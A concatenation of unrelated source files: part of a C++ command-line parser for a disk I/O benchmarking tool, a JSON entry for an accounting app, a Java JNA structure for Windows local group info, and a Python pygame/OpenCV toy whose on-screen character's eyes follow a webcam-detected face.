but is of limited value since it // would only be valid as a single element distribution. // // Basic numeric validations are done here (similar to XSD for XML). // Cross validation with other workload parameters (blocksize) and whole // distribution validation is delayed to common code. // while (true) { // Consume IO% integer fOk = Util::ParseUInt(arg, pctCur, arg); if (!fOk) { fprintf(stderr, "Invalid integer IO%%: must be > 0 and <= %u\n", 100 - pctAcc); return false; } // hole is ok else if (pctCur > 100) { fprintf(stderr, "Invalid IO%% %u: must be >= 0 and <= %u\n", pctCur, 100 - pctAcc); return false; } // Expect separator if (*arg++ != '/') { fprintf(stderr, "Expected / separator after %u\n", pctCur); return false; } // Consume Target%/Absolute range integer if (dType == DistributionType::Percent) { // Percent specification fOk = Util::ParseUInt(arg, targetCur, arg); if (!fOk) { fprintf(stderr, "Invalid integer Target%%: must be > 0 and <= %I64u\n", 100 - targetAcc); return false; } // no hole else if (targetCur == 0 || targetCur > 100) { fprintf(stderr, "Invalid Target%% %I64u: must be > 0 and <= %I64u\n", targetCur, 100 - targetAcc); return false; } } else { // Size specification fOk = CmdLineParser::_GetSizeInBytes(arg, targetCur, &arg); if (!fOk) { // error already emitted return fOk; } if (targetCur == 0) { fprintf(stderr, "Invalid zero length target range\n"); return false; } } // Add range from [accumulator - accumulator + current) => ... // Note that zero pctCur indicates a hole where no IO is desired - this is recorded // for fidelity of display/profile but will never match on lookup, as intended. vOr.emplace_back(pctAcc, pctCur, make_pair(targetAcc, targetCur)); // Now move accumulators for the next tuple/completion pctAcc += pctCur; targetAcc += targetCur; // Expect/consume separator for next tuple? if (*arg == ':') { ++arg; continue; } // Done? 
if (*arg == '\0') { break; } fprintf(stderr, "Unexpected characters in specification '%s'\n", arg); return false; } // Apply to all targets for (auto& t : vTargets) { t.SetDistributionRange(vOr, dType); } return true; } bool CmdLineParser::_ReadParametersFromCmdLine(const int argc, const char *argv[], Profile *pProfile, struct Synchronization *synch, bool& fXMLProfile) { int nParamCnt = argc - 1; const char** args = argv + 1; bool fError = false; TimeSpan timeSpan; // // Pass 1 - determine parameter set type: cmdline specification or XML, and preparse targets/blocksize // ParseState isXMLSet = ParseState::Unknown; ParseState isXMLResultFormat = ParseState::Unknown; ParseState isProfileOnly = ParseState::Unknown; ParseState isVerbose = ParseState::Unknown; ParseState isRandomSeed = ParseState::Unknown; ParseState isWarmupTime = ParseState::Unknown; ParseState isDurationTime = ParseState::Unknown; ParseState isCooldownTime = ParseState::Unknown; ULONG randomSeedValue = 0; ULONG warmupTime = 0; ULONG durationTime = 0; ULONG cooldownTime = 0; const char *xmlProfile = nullptr; // // Find all target specifications. Note that this assumes all non-target // parameters are single tokens; e.g. "-Hsomevalue" and never "-H somevalue". // Targets follow parameter specifications. // vector<Target> vTargets; for (int i = 0, inTargets = false; i < nParamCnt; ++i) { if (!_IsSwitchChar(args[i][0])) { inTargets = true; Target target; target.SetPath(args[i]); vTargets.push_back(target); } else if (inTargets) { fprintf(stderr, "ERROR: parameters (%s) must come before targets on the command line\n", args[i]); return false; } } // // Find composable and dependent parameters as we resolve the parameter set. // for (int i = 0; i < nParamCnt; ++i) { if (_IsSwitchChar(args[i][0])) { const char *arg = &args[i][2]; switch(args[i][1]) { case 'b': // Block size does not compose with XML profile spec if (isXMLSet == ParseState::True) { fprintf(stderr, "ERROR: -b is not compatible with -X XML profile specification\n"); return false; } else { UINT64 ullBlockSize; if (_GetSizeInBytes(arg, ullBlockSize, nullptr) && ullBlockSize < MAXUINT32) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetBlockSizeInBytes((DWORD)ullBlockSize); } } else { fprintf(stderr, "ERROR: invalid block size passed to -b\n"); return false; } _dwBlockSize = (DWORD)ullBlockSize; isXMLSet = ParseState::False; } break; case 'C': { int c = atoi(arg); if (c >= 0) { cooldownTime = c; isCooldownTime = ParseState::True; } else { fprintf(stderr, "ERROR: invalid cooldown time (-C): '%s'\n", arg); return false; } } break; case 'd': { int c = atoi(arg); if (c >= 0) { durationTime = c; isDurationTime = ParseState::True; } else { fprintf(stderr, "ERROR: invalid measured duration time (-d): '%s'\n", arg); return false; } } break; case 'W': { int c = atoi(arg); if (c >= 0) { warmupTime = c; isWarmupTime = ParseState::True; } else { fprintf(stderr, "ERROR: invalid warmup time (-W): '%s'\n", arg); return false; } } break; case 'R': // re-output profile only (no run) if ('p' == *arg) { isProfileOnly = ParseState::True; ++arg; } if ('\0' != *arg) { // Explicit results format if (strcmp(arg, "xml") == 0) { isXMLResultFormat = ParseState::True; } else if (strcmp(arg, "text") != 0) { fprintf(stderr, "ERROR: invalid results format (-R): '%s'\n", arg); return false; } else { isXMLResultFormat = ParseState::False; } } else { // allow for -Rp shorthand for default profile-only format if (isProfileOnly != ParseState::True) { fprintf(stderr, "ERROR: unspecified 
results format -R: use [p]<text|xml>\n"); return false; } } break; case 'v': isVerbose = ParseState::True; break; case 'X': if (isXMLSet == ParseState::Unknown) { isXMLSet = ParseState::True; } else { fprintf(stderr, "ERROR: multiple XML profiles specified (-X)\n"); return false; } xmlProfile = arg; break; case 'z': { char *endPtr = nullptr; if (*arg == '\0') { randomSeedValue = (ULONG) GetTickCount64(); } else { randomSeedValue = strtoul(arg, &endPtr, 10); if (*endPtr != '\0') { fprintf(stderr, "ERROR: invalid random seed value '%s' specified - must be a valid 32 bit integer\n", arg); return false; } } isRandomSeed = ParseState::True; } break; default: // no other switches are valid in combination with -X // if we've seen X, this means it is bad // if not, we know it will not be X if (isXMLSet == ParseState::True) { fprintf(stderr, "ERROR: invalid XML profile specification; parameter %s not compatible with -X\n", args[i]); return false; } else { isXMLSet = ParseState::False; } } } } // XML profile? if (isXMLSet == ParseState::True) { if (!_ReadParametersFromXmlFile(xmlProfile, pProfile, &vTargets)) { return false; } } // // Apply profile common parameters - note that results format is unmodified if R not explicitly provided // if (isXMLResultFormat == ParseState::True) { pProfile->SetResultsFormat(ResultsFormat::Xml); } else if (isXMLResultFormat == ParseState::False) { pProfile->SetResultsFormat(ResultsFormat::Text); } if (isProfileOnly == ParseState::True) { pProfile->SetProfileOnly(true); } if (isVerbose == ParseState::True) { pProfile->SetVerbose(true); } // // Apply timespan common composable parameters // if (isXMLSet == ParseState::True) { for (auto& ts : const_cast<vector<TimeSpan> &>(pProfile->GetTimeSpans())) { if (isRandomSeed == ParseState::True) { ts.SetRandSeed(randomSeedValue); } if (isWarmupTime == ParseState::True) { ts.SetWarmup(warmupTime); } if (isDurationTime == ParseState::True) { ts.SetDuration(durationTime); } if (isCooldownTime == ParseState::True) { ts.SetCooldown(cooldownTime); } } } else { if (isRandomSeed == ParseState::True) { timeSpan.SetRandSeed(randomSeedValue); } if (isWarmupTime == ParseState::True) { timeSpan.SetWarmup(warmupTime); } if (isDurationTime == ParseState::True) { timeSpan.SetDuration(durationTime); } if (isCooldownTime == ParseState::True) { timeSpan.SetCooldown(cooldownTime); } } // Now done if XML profile if (isXMLSet == ParseState::True) { fXMLProfile = true; return true; } // // Parse full command line for profile // // initial parse for cache/writethrough // these are built up across the entire cmd line and applied at the end. // this allows for conflicts to be thrown for mixed -h/-S as needed. TargetCacheMode t = TargetCacheMode::Undefined; WriteThroughMode w = WriteThroughMode::Undefined; MemoryMappedIoMode m = MemoryMappedIoMode::Undefined; MemoryMappedIoFlushMode f = MemoryMappedIoFlushMode::Undefined; bool bExit = false; while (nParamCnt) { const char* arg = *args; const char* const carg = arg; // save for error reporting, arg is modified during parse // Targets follow parameters on command line. If this is a target, we are done now. 
if (!_IsSwitchChar(*arg)) { break; } // skip switch character, provide length ++arg; const size_t argLen = strlen(arg); switch (*arg) { case '?': _DisplayUsageInfo(argv[0]); exit(0); case 'a': //affinity //-a1,2,3,4 (assign threads to cpus 1,2,3,4 (round robin)) if (!_ParseAffinity(arg, &timeSpan)) { fError = true; } break; case 'b': //block size // nop - block size has been taken care of before the loop break; case 'B': //base file offset (offset from the beginning of the file) if (*(arg + 1) != '\0') { UINT64 cb; if (_GetSizeInBytes(arg + 1, cb, nullptr)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetBaseFileOffsetInBytes(cb); } } else { fprintf(stderr, "ERROR: invalid base file offset passed to -B\n"); fError = true; } } else { fError = true; } break; case 'c': //create file of the given size if (*(arg + 1) != '\0') { UINT64 cb; if (_GetSizeInBytes(arg + 1, cb, nullptr)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetFileSize(cb); i->SetCreateFile(true); } } else { fprintf(stderr, "ERROR: invalid file size passed to -c\n"); fError = true; } } else { fError = true; } break; case 'C': //cool down time - pass 1 composable break; case 'd': //duration - pass 1 composable break; case 'D': //standard deviation { timeSpan.SetCalculateIopsStdDev(true); int x = atoi(arg + 1); if (x > 0) { timeSpan.SetIoBucketDurationInMilliseconds(x); } } break; case 'e': //etw if (!_ParseETWParameter(arg, pProfile)) { fError = true; } break; case 'f': if (isdigit(*(arg + 1))) { UINT64 cb; if (_GetSizeInBytes(arg + 1, cb, nullptr)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetMaxFileSize(cb); } } else { fprintf(stderr, "ERROR: invalid max file size passed to -f\n"); fError = true; } } else { if ('\0' == *(arg + 1)) { fError = true; } else { // while -frs (or -fsr) are generally conflicting intentions as far as // the OS is concerned, do not enforce while (*(++arg) != '\0') { switch (*arg) { case 'r': for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetRandomAccessHint(true); } break; case 's': for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetSequentialScanHint(true); } break; case 't': for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetTemporaryFileHint(true); } break; default: fError = true; break; } } } } break; case 'F': //total number of threads { int c = atoi(arg + 1); if (c > 0) { timeSpan.SetThreadCount(c); } else { fError = true; } } break; case 'g': //throughput in bytes per millisecond (gNNN) OR iops (gNNNi) { // units? 
bool isBpms = false; if (isdigit(arg[argLen - 1])) { isBpms = true; } else if (arg[argLen - 1] != 'i') { // not IOPS, so its bad fError = true; } if (!fError) { int c = atoi(arg + 1); if (c > 0) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { if (isBpms) { i->SetThroughput(c); } else { i->SetThroughputIOPS(c); } } } else { fError = true; } } } break; case 'h': // compat: disable os cache and set writethrough; now equivalent to -Sh if (t == TargetCacheMode::Undefined && w == WriteThroughMode::Undefined) { t = TargetCacheMode::DisableOSCache; w = WriteThroughMode::On; } else { fprintf(stderr, "ERROR: -h conflicts with earlier specification of cache/writethrough\n"); fError = true; } break; case 'i': //number of IOs to issue before think time { int c = atoi(arg + 1); if (c > 0) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetBurstSize(c); i->SetUseBurstSize(true); } } else { fError = true; } } break; case 'j': //time to wait between bursts of IOs { int c = atoi(arg + 1); if (c > 0) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetThinkTime(c); i->SetEnableThinkTime(true); } } else { fError = true; } } break; case 'I': //io priority { int x = atoi(arg + 1); if (x > 0 && x < 4) { PRIORITY_HINT hint[] = { IoPriorityHintVeryLow, IoPriorityHintLow, IoPriorityHintNormal }; for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetIOPriorityHint(hint[x - 1]); } } else { fError = true; } } break; case 'l': //large pages for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetUseLargePages(true); } break; case 'L': //measure latency timeSpan.SetMeasureLatency(true); break; case 'n': //disable affinity (by default simple affinity is turned on) timeSpan.SetDisableAffinity(true); break; case 'N': if (!_ParseFlushParameter(arg, &f)) { fError = true; } break; case 'o': //request count (1==synchronous) { int c = atoi(arg + 1); if (c > 0) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetRequestCount(c); } } else { fError = true; } } break; case 'O': //total number of IOs/thread - for use with -F { int c = atoi(arg + 1); if (c > 0) { timeSpan.SetRequestCount(c); } else { fError = true; } } break; case 'p': //start async IO operations with the same offset //makes sense only for -o2 and greater for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetUseParallelAsyncIO(true); } break; case 'P': //show progress every x IO operations { int c = atoi(arg + 1); if (c < 1) { c = 65536; } pProfile->SetProgress(c); } break; case 'r': //random access { // mixed random/sequential pct split? 
if (*(arg + 1) == 's') { int c = 0; ++arg; if (*(arg + 1) == '\0') { fprintf(stderr, "ERROR: no random percentage passed to -rs\n"); fError = true; } else { c = atoi(arg + 1); if (c <= 0 || c > 100) { fprintf(stderr, "ERROR: random percentage passed to -rs should be between 1 and 100\n"); fError = true; } } if (!fError) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { // if random ratio is unset and actual alignment is already specified, // -s was used: don't allow this for clarity of intent if (!i->GetRandomRatio() && i->GetBlockAlignmentInBytes(true)) { fprintf(stderr, "ERROR: use -r to specify IO alignment when using mixed random/sequential IO (-rs)\n"); fError = true; break; } // if random ratio was already set to something other than 100% (-r) // then -rs was specified multiple times: catch and block this if (i->GetRandomRatio() && i->GetRandomRatio() != 100) { fprintf(stderr, "ERROR: mixed random/sequential IO (-rs) specified multiple times\n"); fError = true; break; } // Note that -rs100 is the same as -r. It will not result in the <RandomRatio> element // in the XML profile; we will still only emit/accept 1-99 there. // // Saying -rs0 (sequential) would create an ambiguity between that and -r[nnn]. Rather // than bend the intepretation of -r[nnn] for the special case of -rs0 we will error // it out in the bounds check above. i->SetRandomRatio(c); } } } // random distribution else if (*(arg + 1) == 'd') { // advance past the d arg += 2; fError = !_ParseRandomDistribution(arg, vTargets); } // random block alignment // if mixed random/sequential not already specified, set to 100% else { UINT64 cb = _dwBlockSize; if (*(arg + 1) != '\0') { if (!_GetSizeInBytes(arg + 1, cb, nullptr) || (cb == 0)) { fprintf(stderr, "ERROR: invalid alignment passed to -r\n"); fError = true; } } if (!fError) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { // Do not override -rs specification if (!i->GetRandomRatio()) { i->SetRandomRatio(100); } // Multiple -rNN? // Note that -rs100 -r[NN] will pass since -rs does not set alignment. // We are only validating a single -rNN specification. else if (i->GetRandomRatio() == 100 && i->GetBlockAlignmentInBytes(true)) { fprintf(stderr, "ERROR: random IO (-r) specified multiple times\n"); fError = true; break; } // -s already set the alignment? 
if (i->GetBlockAlignmentInBytes(true)) { fprintf(stderr, "ERROR: sequential IO (-s) conflicts with random IO (-r/-rs)\n"); fError = true; break; } i->SetBlockAlignmentInBytes(cb); } } } } break; case 'R': // output profile/results format engine - handled in pass 1 break; case 's': //stride size { int idx = 1; if ('i' == *(arg + idx)) { // do interlocked sequential mode // ISSUE-REVIEW: this does nothing if -r is specified // ISSUE-REVIEW: this does nothing if -p is specified // ISSUE-REVIEW: this does nothing if we are single-threaded for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetUseInterlockedSequential(true); } idx++; } for (auto i = vTargets.begin(); i != vTargets.end(); i++) { // conflict -s with -rs/-s if (i->GetRandomRatio()) { if (i->GetRandomRatio() == 100) { fprintf(stderr, "ERROR: sequential IO (-s) conflicts with random IO (-r/-rs)\n"); } else { fprintf(stderr, "ERROR: use -r to specify IO alignment for -rs\n"); } fError = true; break; } // conflict with multiple -s if (i->GetBlockAlignmentInBytes(true)) { fprintf(stderr, "ERROR: sequential IO (-s) specified multiple times\n"); fError = true; break; } } if (*(arg + idx) != '\0') { UINT64 cb; // Note that we allow -s0, as unusual as that would be. // The counter-case of -r0 is invalid and checked for. if (_GetSizeInBytes(arg + idx, cb, nullptr)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetBlockAlignmentInBytes(cb); } } else { fprintf(stderr, "ERROR: invalid stride size passed to -s\n"); fError = true; } } else { // explicitly pass through the block size so that we can detect // -rs/-s intent conflicts when attempting to set -rs for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetBlockAlignmentInBytes(i->GetBlockSizeInBytes()); } } } break; case 'S': //control os/hw/remote caching and writethrough { // parse flags - it is an error to multiply specify either property, which // can be detected simply by checking if we move one from !undefined. // this also handles conflict cases. 
int idx; for (idx = 1; !fError && *(arg + idx) != '\0'; idx++) { switch (*(arg + idx)) { case 'b': if (t == TargetCacheMode::Undefined) { t = TargetCacheMode::Cached; } else { fprintf(stderr, "ERROR: -Sb conflicts with earlier specification of cache mode\n"); fError = true; } break; case 'h': if (t == TargetCacheMode::Undefined && w == WriteThroughMode::Undefined && m == MemoryMappedIoMode::Undefined) { t = TargetCacheMode::DisableOSCache; w = WriteThroughMode::On; } else { fprintf(stderr, "ERROR: -Sh conflicts with earlier specification of cache/writethrough/memory mapped\n"); fError = true; } break; case 'm': if (m == MemoryMappedIoMode::Undefined && t != TargetCacheMode::DisableOSCache) { m = MemoryMappedIoMode::On; } else { fprintf(stderr, "ERROR: -Sm conflicts with earlier specification of memory mapped IO/unbuffered IO\n"); fError = true; } break; case 'r': if (t == TargetCacheMode::Undefined) { t = TargetCacheMode::DisableLocalCache; } else { fprintf(stderr, "ERROR: -Sr conflicts with earlier specification of cache mode\n"); fError = true; } break; case 'u': if (t == TargetCacheMode::Undefined && m == MemoryMappedIoMode::Undefined) { t = TargetCacheMode::DisableOSCache; } else { fprintf(stderr, "ERROR: -Su conflicts with earlier specification of cache mode/memory mapped IO\n"); fError = true; } break; case 'w': if (w == WriteThroughMode::Undefined) { w = WriteThroughMode::On; } else { fprintf(stderr, "ERROR -Sw conflicts with earlier specification of write through\n"); fError = true; } break; default: fprintf(stderr, "ERROR: unrecognized option provided to -S\n"); fError = true; break; } } // bare -S, parse loop did not advance if (!fError && idx == 1) { if (t == TargetCacheMode::Undefined && m == MemoryMappedIoMode::Undefined) { t = TargetCacheMode::DisableOSCache; } else { fprintf(stderr, "ERROR: -S conflicts with earlier specification of cache mode\n"); fError = true; } } } break; case 't': //number of threads per file { int c = atoi(arg + 1); if (c > 0) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetThreadsPerFile(c); } } else { fError = true; } } break; case 'T': //offsets between threads reading the same file { UINT64 cb; if (_GetSizeInBytes(arg + 1, cb, nullptr) && (cb > 0)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetThreadStrideInBytes(cb); } } else { fprintf(stderr, "ERROR: invalid offset passed to -T\n"); fError = true; } } break; case 'v': //verbose mode - handled in pass 1 break; case 'w': //write test [default=read] { int c = 0; if (*(arg + 1) == '\0') { fprintf(stderr, "ERROR: no write ratio passed to -w\n"); fError = true; } else { c = atoi(arg + 1); if (c < 0 || c > 100) { fprintf(stderr, "ERROR: write ratio passed to -w must be between 0 and 100 (percent)\n"); fError = true; } } if (!fError) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetWriteRatio(c); } } } break; case 'W': //warm up time - pass 1 composable break; case 'x': //completion routines timeSpan.SetCompletionRoutines(true); break; case 'y': //external synchronization switch (*(arg + 1)) { case 's': _hEventStarted = CreateEvent(NULL, TRUE, FALSE, arg + 2); if (NULL == _hEventStarted) { fprintf(stderr, "Error creating/opening start notification event: '%s'\n", arg + 2); exit(1); // TODO: this class shouldn't terminate the process } break; case 'f': _hEventFinished = CreateEvent(NULL, TRUE, FALSE, arg + 2); if (NULL == _hEventFinished) { fprintf(stderr, "Error creating/opening finish notification event: '%s'\n", arg + 2); exit(1); // TODO: 
this class shouldn't terminate the process } break; case 'r': synch->hStartEvent = CreateEvent(NULL, TRUE, FALSE, arg + 2); if (NULL == synch->hStartEvent) { fprintf(stderr, "Error creating/opening wait-for-start event: '%s'\n", arg + 2); exit(1); // TODO: this class shouldn't terminate the process } break; case 'p': synch->hStopEvent = CreateEvent(NULL, TRUE, FALSE, arg + 2); if (NULL == synch->hStopEvent) { fprintf(stderr, "Error creating/opening force-stop event: '%s'\n", arg + 2); exit(1); // TODO: this class shouldn't terminate the process } break; case 'e': { HANDLE hEvent = OpenEvent(EVENT_MODIFY_STATE, FALSE, arg + 2); if (NULL == hEvent) { fprintf(stderr, "Error opening event '%s'\n", arg + 2); exit(1); // TODO: this class shouldn't terminate the process } if (!SetEvent(hEvent)) { fprintf(stderr, "Error setting event '%s'\n", arg + 2); exit(1); // TODO: this class shouldn't terminate the process } CloseHandle(hEvent); printf("Succesfully set event: '%s'\n", arg + 2); bExit = true; break; } default: fError = true; } case 'z': //random seed - pass 1 composable break; case 'Z': //zero write buffers if (*(arg + 1) == '\0') { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetZeroWriteBuffers(true); } } else if (*(arg + 1) == 'r' && *(arg + 2) == '\0') { timeSpan.SetRandomWriteData(true); } else { UINT64 cb = 0; string sPath; if (_GetRandomDataWriteBufferData(string(arg + 1), cb, sPath) && (cb > 0)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetRandomDataWriteBufferSize(cb); i->SetRandomDataWriteBufferSourcePath(sPath); } } else { fprintf(stderr, "ERROR: invalid size passed to -Z\n"); fError = true; } } break; default: fprintf(stderr, "ERROR: invalid option: '%s'\n", carg); return false; } if (fError) { // note: original pointer to the cmdline argument, without parse movement fprintf(stderr, "ERROR: incorrectly provided option: '%s'\n", carg); return false; } --nParamCnt; ++args; } // // exit if a user specified an action which was already satisfied and doesn't require running test // if (bExit) { printf("Now exiting...\n"); exit(1); // TODO: this class shouldn't terminate the process } if (vTargets.size() < 1) { fprintf(stderr, "ERROR: need to provide at least one filename\n"); return false; } // apply resultant cache/writethrough/memory mapped io modes to the targets for (auto i = vTargets.begin(); i != vTargets.end(); i++) { if (t != TargetCacheMode::Undefined) { i->SetCacheMode(t); } if (w != WriteThroughMode::Undefined) { i->SetWriteThroughMode(w); } if (m != MemoryMappedIoMode::Undefined) { i->SetMemoryMappedIoMode(m); } if (f != MemoryMappedIoFlushMode::Undefined) { i->SetMemoryMappedIoFlushMode(f); } } // ... 
and apply targets to the timespan for (auto i = vTargets.begin(); i != vTargets.end(); i++) { timeSpan.AddTarget(*i); } pProfile->AddTimeSpan(timeSpan); return true; } bool CmdLineParser::_ReadParametersFromXmlFile(const char *pszPath, Profile *pProfile, vector<Target> *pvSubstTargets) { XmlProfileParser parser; return parser.ParseFile(pszPath, pProfile, pvSubstTargets, NULL); } bool CmdLineParser::ParseCmdLine(const int argc, const char *argv[], Profile *pProfile, struct Synchronization *synch, SystemInformation *pSystem) { assert(nullptr != argv); assert(nullptr != pProfile); assert(NULL != synch); if (argc < 2) { _DisplayUsageInfo(argv[0]); return false; } string sCmdLine; for (int i = 0; i < argc - 1; i++) { sCmdLine += argv[i]; sCmdLine += ' '; } if (argc > 0) { sCmdLine += argv[argc - 1]; } pProfile->SetCmdLine(sCmdLine); bool fOk = true; bool fXMLProfile = false; fOk = _ReadParametersFromCmdLine(argc, argv, pProfile, synch, fXMLProfile); // Check additional restrictions and conditions on the parsed profile. // Note that on the current cmdline, all targets receive the same parameters // so their mutual consistency only needs to be checked once. Do not check // system consistency in profile-only operation (this is only required at // execution time). if (fOk) { fOk = pProfile->Validate(!fXMLProfile, pProfile->GetProfileOnly() ? nullptr : pSystem); } return fOk; }
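The size parser in CmdLineParser::_GetSizeInBytes above accepts K/M/G/T suffixes by letting the switch cases fall through, so each larger unit multiplies by another factor of 1024. A minimal standalone sketch of that idea (not diskspd's code; it drops the block-relative 'B' suffix, the continuation/pszRest handling and the overflow guard shown above) could look like this:

// Standalone sketch of the suffix-multiplier technique: 'T' deliberately
// falls through to 'G', 'M' and 'K', multiplying by 1024 at each step.
#include <cctype>
#include <cstdint>
#include <cstdlib>

bool ParseSizeSuffix(const char* s, uint64_t& out)
{
    char* rest = nullptr;
    uint64_t value = strtoull(s, &rest, 10);
    if (rest == s) return false;                 // no digits at all
    uint64_t multiplier = 1;

    switch (toupper(static_cast<unsigned char>(*rest)))
    {
    case 'T': multiplier *= 1024;                // fall through
    case 'G': multiplier *= 1024;                // fall through
    case 'M': multiplier *= 1024;                // fall through
    case 'K': multiplier *= 1024; ++rest; break;
    case '\0': break;                            // plain byte count
    default: return false;                       // unknown suffix
    }

    if (*rest != '\0') return false;             // trailing junk after suffix
    out = value * multiplier;                    // real parser also checks overflow
    return true;
}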
41,007
310
<reponame>dreeves/usesthis<filename>gear/software/w/wave.2.json { "name": "Wave", "description": "An accounting and invoicing service.", "url": "https://www.waveapps.com/" }
67
357
/* * * Copyright (c) 2012-2015 VMware, Inc. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy * of the License at http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, without * warranties or conditions of any kind, EITHER EXPRESS OR IMPLIED. See the * License for the specific language governing permissions and limitations * under the License. * */ package com.vmware.identity.idm.server; import java.util.Arrays; import java.util.List; import com.sun.jna.Pointer; import com.vmware.identity.interop.ossam.BaseOsSamNativeStructure; public class LocalGroupInfo1 extends BaseOsSamNativeStructure { static final int Level = 1; //typedef struct _LOCALGROUP_INFO_1 { // LPWSTR lgrpi1_name; // LPWSTR lgrpi1_comment; //} LOCALGROUP_INFO_1, *PLOCALGROUP_INFO_1, *LPLOCALGROUP_INFO_1; public String name; public String comment; public LocalGroupInfo1() { super(); } public LocalGroupInfo1(Pointer p) { super(p); } @Override protected List<String> getFieldOrder() { return Arrays.asList(new String[] { "name", "comment" }); } }
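LocalGroupInfo1 mirrors the native LOCALGROUP_INFO_1 structure quoted in its comment so JNA can map the buffer returned by the NetLocalGroup* APIs. For orientation only, the same level-1 lookup done directly from C++ against the Win32 API would look roughly like the sketch below (the function name is made up; error handling is reduced to a status check):

// Hedged sketch: fetch level-1 information for a local group via the Win32
// NetLocalGroupGetInfo API and free the returned buffer. Link Netapi32.lib.
#include <windows.h>
#include <lm.h>
#include <cstdio>

void PrintLocalGroupComment(const wchar_t* groupName)
{
    LPBYTE buffer = nullptr;
    NET_API_STATUS status = NetLocalGroupGetInfo(nullptr /*local machine*/,
                                                 groupName, 1, &buffer);
    if (status == NERR_Success && buffer != nullptr)
    {
        LOCALGROUP_INFO_1* info = reinterpret_cast<LOCALGROUP_INFO_1*>(buffer);
        wprintf(L"%s: %s\n", info->lgrpi1_name, info->lgrpi1_comment);
        NetApiBufferFree(buffer);
    }
    else
    {
        wprintf(L"NetLocalGroupGetInfo failed with status %lu\n", status);
    }
}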
521
389
import cv2 import os from math import sin, cos, radians import ctypes import time import pygame def pos(gameDisplay,ge,x,y): gameDisplay.blit(ge,(x,y)) def blush(gameDisplay,kb): x = (scl-ix)/2 y = scb-iy gameDisplay.blit(kb,(x,y)) pygame.display.update() def eyeloc(gameDisplay,eye,ex,ey): gameDisplay.blit(eye,(ex,ey)) def move_eyes(gameDisplay, xcord, ycord,): w = scl h = scb x = (w-ix)/2 y = h-iy ex = (w-ix)/2 ey = h-iy nx = ex+ xcord/20 -10 ny = ey + ycord/20 -10 gameDisplay.blit(eye,(nx,ny)) gameDisplay.blit(ge,(x,y)) #code to redraw images pygame.display.update() def show_yuri_image(w, h): w = scl h = scb os.environ['SDL_VIDEO_WINDOW_POS'] = "0,0" gameDisplay = pygame.display.set_mode((w,h)) print(gameDisplay) pygame.display.set_caption("YURI BLUSH") x = (w-ix)/2 y = h-iy ex = (w-ix)/2 ey = h-iy gameDisplay.fill(black) #eyeloc(gameDisplay, eye, ex, ey) #pos(gameDisplay, ge, x, y) pygame.display.update() return gameDisplay def rotate_image(image, angle): if angle == 0: return image height, width = image.shape[:2] rot_mat = cv2.getRotationMatrix2D((width/2, height/2), angle, 0.9) result = cv2.warpAffine(image, rot_mat, (width, height), flags=cv2.INTER_LINEAR) return result def rotate_point(pos, img, angle): if angle == 0: return pos x = pos[0] - img.shape[1]*0.4 y = pos[1] - img.shape[0]*0.4 newx = x*cos(radians(angle)) + y*sin(radians(angle)) + img.shape[1]*0.4 newy = -x*sin(radians(angle)) + y*cos(radians(angle)) + img.shape[0]*0.4 return int(newx), int(newy), pos[2], pos[3] if __name__=='__main__': pygame.init() black = (255,255,255) ix = 960 iy = 960 assets = os.path.join('assets') ge = pygame.image.load(os.path.join(assets,'yuri_cute.png')) eye = pygame.image.load(os.path.join(assets,'yuri_eyes.png')) kb = pygame.image.load(os.path.join(assets,'yuri_blush.png')) # user32 = ctypes.windll.user32 # scl,scb = user32.GetSystemMetrics(0), user32.GetSystemMetrics(1) scl,scb = 1920, 1080 print("Width: ",scl,"Height: ",scb) #screen metrics camera = cv2.VideoCapture(0) w = camera.set(3, scl/2) h = camera.set(4, scb/2) face = cv2.CascadeClassifier(os.path.join("face_detector","haarcascade_frontalface_alt2.xml")) fps = camera.get(cv2.CAP_PROP_FPS) print("fps: ",fps) settings = { 'scaleFactor': 1.3, 'minNeighbors': 3, 'minSize': (50, 50), } gameDisplay = show_yuri_image(scl, scb) running = True while running: event = pygame.event.get() if(event is not None): pressed = pygame.key.get_pressed() if(pressed[pygame.K_q]): running = False ret, imgn = camera.read() img = cv2.flip(imgn, +1) for angle in [0, -25, 25]: rimg = rotate_image(img, angle) detected = face.detectMultiScale(rimg, **settings) if len(detected): detected = [rotate_point(detected[-1], img, -angle)] break # Make a copy as we don't want to draw on the original image: for x, y, w, h in detected[-1:]: cv2.rectangle(img, (x, y), (x+w, y+h), (255,0,0), 2) xcord = (x+w)/2 ycord = 2*(y+h)/3 # to look at the eyes # put in else move_eyes(gameDisplay, xcord, ycord,) if x+w >400 and y+h >400: print("too close") blush(gameDisplay,kb) else: move_eyes(gameDisplay, xcord, ycord,) #cv2.imshow('facedetect', img) if cv2.waitKey(5) != -1: break cv2.destroyAllWindows() pygame.quit() quit()
2,069
3,227
